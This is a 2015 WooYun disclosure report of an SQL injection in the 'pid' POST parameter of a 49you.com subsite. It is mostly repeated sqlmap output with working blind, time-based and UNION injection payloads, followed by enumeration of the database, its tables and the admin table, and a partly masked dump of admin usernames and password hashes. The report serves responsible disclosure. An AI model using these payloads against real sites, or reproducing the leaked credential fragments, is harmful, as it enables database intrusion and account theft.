当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123098

漏洞标题:49you某分站存在SQL注入

相关厂商:49you.com

漏洞作者: hh2014

提交时间:2015-06-28 11:51

修复时间:2015-08-13 10:22

公开时间:2015-08-13 10:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-28: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

RT

详细说明:

sql注入

http://gm.49you.com/spirit/send2.html
post参数
member_id=0&pid=51
pid参数存在注入


49you.jpg

漏洞证明:

sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Parameter: pid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: member_id=0&pid=51) AND 7426=7426 AND (3485=3485
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: member_id=0&pid=51) AND (SELECT * FROM (SELECT(SLEEP(5)))iIrZ) AND (7641=7641
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: member_id=0&pid=-7597) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766a7171,0x494c6d416c78414b584f,0x717a706a71),NULL,NULL--
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL--
---
web application technology: PHP 5.3.22, Nginx
back-end DBMS: MySQL 5.0.12
current user: 'customer_new@localhost'
current database: 'customer_new_49you'
current user is DBA: False
available databases [2]:
[*] customer_new_49you
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: member_id=0&pid=51) AND 7426=7426 AND (3485=3485
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: member_id=0&pid=51) AND (SELECT * FROM (SELECT(SLEEP(5)))iIrZ) AND (7641=7641
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: member_id=0&pid=-7597) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766a7171,0x494c6d416c78414b584f,0x717a706a71),NULL,NULL--
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL--
---
web application technology: PHP 5.3.22, Nginx
back-end DBMS: MySQL 5.0.12
Database: customer_new_49you
[12 tables]
+-------------------+
| ap_admininfo |
| ap_evalute |
| ap_loginfo |
| ap_plo_category |
| ap_ploblem |
| ap_qqadmin |
| ap_ratcontent |
| ap_rating |
| ap_report |
| ap_screen |
| ap_spirit_config |
| ap_spirit_ploblem |
+-------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: member_id=0&pid=51) AND 7426=7426 AND (3485=3485
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: member_id=0&pid=51) AND (SELECT * FROM (SELECT(SLEEP(5)))iIrZ) AND (7641=7641
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: member_id=0&pid=-7597) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766a7171,0x494c6d416c78414b584f,0x717a706a71),NULL,NULL--
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL--
---
web application technology: PHP 5.3.22, Nginx
back-end DBMS: MySQL 5.0.12
Database: customer_new_49you
Table: ap_admininfo
[10 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| addtime | int(11) |
| entry_time | varchar(50) |
| headimg | varchar(100) |
| password | varchar(50) |
| role | tinyint(2) |
| status | tinyint(2) |
| tid | int(11) |
| truename | varchar(50) |
| updatetime | int(11) |
| username | varchar(11) |
+------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: member_id=0&pid=51) AND 7426=7426 AND (3485=3485
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: member_id=0&pid=51) AND (SELECT * FROM (SELECT(SLEEP(5)))iIrZ) AND (7641=7641
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: member_id=0&pid=-7597) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766a7171,0x494c6d416c78414b584f,0x717a706a71),NULL,NULL--
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,[QUERY],NULL,NULL--
---
web application technology: PHP 5.3.22, Nginx
back-end DBMS: MySQL 5.0.12
Database: customer_new_49you
Table: ap_admininfo
[41 entries]
+-----------+----------+------+----------------------------------+
| username | truename | role | password |
+-----------+----------+------+----------------------------------+
mask 区域
*****4    | 4d1906e96fa*****
***** | 3ce90681eb42*****
*****2 | dc483e80a7a*****
*****1 | dc483e80a7a*****
*****1 | 5ff4f22883a*****
*****1 | dc483e80a7a*****
*****1 | dc483e80a7a*****
***** | dc483e80a7a0*****
*****1 | 4d1906e96fa*****
*****1 | a5721016407*****
*****1 | c3336770151*****
***** | c4dc09934ef4*****
***** cc03e74dsfsdfgh*****
*****5 | a2ccbfbe338*****
*****| 3 | 358241e37e*****
*****1 | 87b750fdfeb*****
***** | 2c25ac86a934f*****
*****| 2 | dc483e80a7*****
*****1 | a9f9f219a4b*****
*****1 | e10adc3949b*****
*****4 | c33367701511*****
***** | 4d1906e96fa4*****
*****| 2 | 5ff4f22883*****
***** | 8a5121ce1a3d*****
*****1 | 2e4a30796fb*****
*****1 | 54059ec4d7c*****
*****2 | ea53b454bcd*****
*****1 | 05d06619bf5*****
*****1 | 9fd00aba1fd*****
*****1 | 2c25ac86a93*****
*****1 | 2c25ac86a93*****
***** | 2c25ac86a934f*****
*****1 | a3d39af924d*****
*****1 | effeec3e03c*****
*****1 | 3dc3a813753*****
*****1 | 86bee525c17*****
*****1 | 3dc3a813753*****
*****1 | 3dc3a813753*****
*****1 | 3dc3a813753*****
*****1 | 3dc3a813753*****
*****1 | 3dc3a813753*****
*****----------------*****


用户名:admin 密码:

mask 区域
*****111*****


修复方案:

参数过滤

版权声明:转载请注明来源 hh2014@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-29 10:20

厂商回复:

非常感谢白帽子童鞋 @路人甲,技术正在紧急修复中

最新状态:

暂无


漏洞评价:

评论